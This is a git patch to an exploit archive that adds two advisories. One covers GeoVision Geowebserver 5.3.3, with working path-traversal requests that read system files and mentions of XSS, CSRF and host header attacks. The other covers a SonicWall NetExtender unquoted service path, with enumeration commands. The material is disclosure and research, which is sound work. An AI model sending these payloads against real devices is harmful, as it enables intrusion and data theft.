From 0105a5abef0774e7c18a1925e48885e3a5f65df9 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 18 Aug 2021 05:01:56 +0000 Subject: [PATCH] DB: 2021-08-18 2 changes to exploits/shellcodes SonicWall NetExtender 10.2.0.300 - Unquoted Service Path GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE --- exploits/hardware/webapps/50211.txt | 37 +++++++++++++++++++ exploits/windows/local/50212.txt | 56 +++++++++++++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 95 insertions(+) create mode 100644 exploits/hardware/webapps/50211.txt create mode 100644 exploits/windows/local/50212.txt diff --git a/exploits/hardware/webapps/50211.txt b/exploits/hardware/webapps/50211.txt new file mode 100644 index 000000000..0d0b30922 --- /dev/null +++ b/exploits/hardware/webapps/50211.txt @@ -0,0 +1,37 @@ +# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE +# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM +# Date: 6-16-21 (Vendor Notified) +# Exploit Author: Ken 's1ngular1ty' Pyle +# Vendor Homepage: https://www.geovision.com.tw/cyber_security.php +# Version: <= 5.3.3 +# Tested on: Windows 20XX / MULTIPLE +# CVE : https://www.geovision.com.tw/cyber_security.php + +GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft: + +Nested Exploitation of the LFI, XSS, HTML / Browser Injection: + +GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name= HTTP/1.1 + +Absolute exploitation of the LFI: + +POST /Visitor/bin/WebStrings.srf?obj_name=win.ini + +GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini + +Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor. + + +ex. obj_name=INJECTEDHTML / XSS + +The application fails to properly enforce permissions and sanitize user request. This allows for LFI / Remote Code Execution through several vectors: + +ex. /Visitor//%252e(path to target) + +These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API: + +The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack. + +These attacks were disclosed as part of the IOTVillage Presentation: + + https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20villages/DEFCON%2029%20IoT%20Village%20-%20Ken%20Pyle%20-%20BLUEMONDAY%20Series%20Exploitation%20and%20Mapping%20of%20Vulnerable%20Devices%20at%20Scale.mp4 \ No newline at end of file diff --git a/exploits/windows/local/50212.txt b/exploits/windows/local/50212.txt new file mode 100644 index 000000000..cc840fe1b --- /dev/null +++ b/exploits/windows/local/50212.txt @@ -0,0 +1,56 @@ +# Exploit Title: SonicWall NetExtender 10.2.0.300 - Unquoted Service Path +# Exploit Author: shinnai +# Software Link: https://www.sonicwall.com/products/remote-access/vpn-clients/ +# Version: 10.2.0.300 +# Tested On: Windows +# CVE: CVE-2020-5147 + +--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- +Title: SonicWall NetExtender windows client unquoted service path +vulnerability +Vers.: 10.2.0.300 +Down.: https://www.sonicwall.com/products/remote-access/vpn-clients/ + +Advisory: +https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0023 +CVE ID: CVE-2020-5147 (https://nvd.nist.gov/vuln/detail/CVE-2020-5147) + +URLs: +https://besteffortteam.it/sonicwall-netextender-windows-client-unquoted-service-path-vulnerability/ +https://shinnai.altervista.org/exploits/SH-029-20210109.html + +Desc.: +SonicWall NetExtender Windows client vulnerable to unquoted service path +vulnerability, this allows a local attacker to gain elevated privileges +in the host operating system. +This vulnerability impact SonicWall NetExtender Windows client version +10.2.300 and earlier. + +Poc: + +C:\>sc qc sonicwall_client_protection_svc +[SC] QueryServiceConfig OPERAZIONI RIUSCITE +NOME_SERVIZIO: sonicwall_client_protection_svc + TIPO : 10 WIN32_OWN_PROCESS + TIPO_AVVIO : 2 AUTO_START + CONTROLLO_ERRORE : 1 NORMAL + NOME_PERCORSO_BINARIO : C:\Program Files\SonicWall\Client +Protection Service\SonicWallClientProtectionService.exe <-- Unquoted +Service Path Vulnerability + GRUPPO_ORDINE_CARICAMENTO : + TAG : 0 + NOME_VISUALIZZATO : SonicWall Client Protection Service + DIPENDENZE : + SERVICE_START_NAME : LocalSystem +C:\> + +---------------------------------------------------------------------------------------------------------------------------------------------------------------------- + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i +"auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ +SonicWall Client Protection Service +sonicwall_client_protection_svc C:\Program Files\SonicWall\Client +Protection Service\SonicWallClientProtectionService.exe Auto + +C:\> +---------------------------------------------------------------------------------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 55eb14612..95bb08dd5 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11379,6 +11379,7 @@ id,file,description,date,author,type,platform,port 50135,exploits/linux/local/50135.c,"Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation",2021-07-15,TheFloW,local,linux, 50184,exploits/windows/local/50184.txt,"Amica Prodigy 1.7 - Privilege Escalation",2021-08-10,"Andrea Intilangelo",local,windows, 50188,exploits/android/local/50188.txt,"Xiaomi browser 10.2.4.g - Browser Search History Disclosure",2021-08-10,"Vishwaraj Bhattrai",local,android, +50212,exploits/windows/local/50212.txt,"SonicWall NetExtender 10.2.0.300 - Unquoted Service Path",2021-08-17,shinnai,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -44337,3 +44338,4 @@ id,file,description,date,author,type,platform,port 50208,exploits/hardware/webapps/50208.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure",2021-08-16,LiquidWorm,webapps,hardware, 50209,exploits/hardware/webapps/50209.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)",2021-08-16,LiquidWorm,webapps,hardware, 50210,exploits/hardware/webapps/50210.txt,"COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure",2021-08-16,LiquidWorm,webapps,hardware, +50211,exploits/hardware/webapps/50211.txt,"GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE",2021-08-17,"Ken Pyle",webapps,hardware,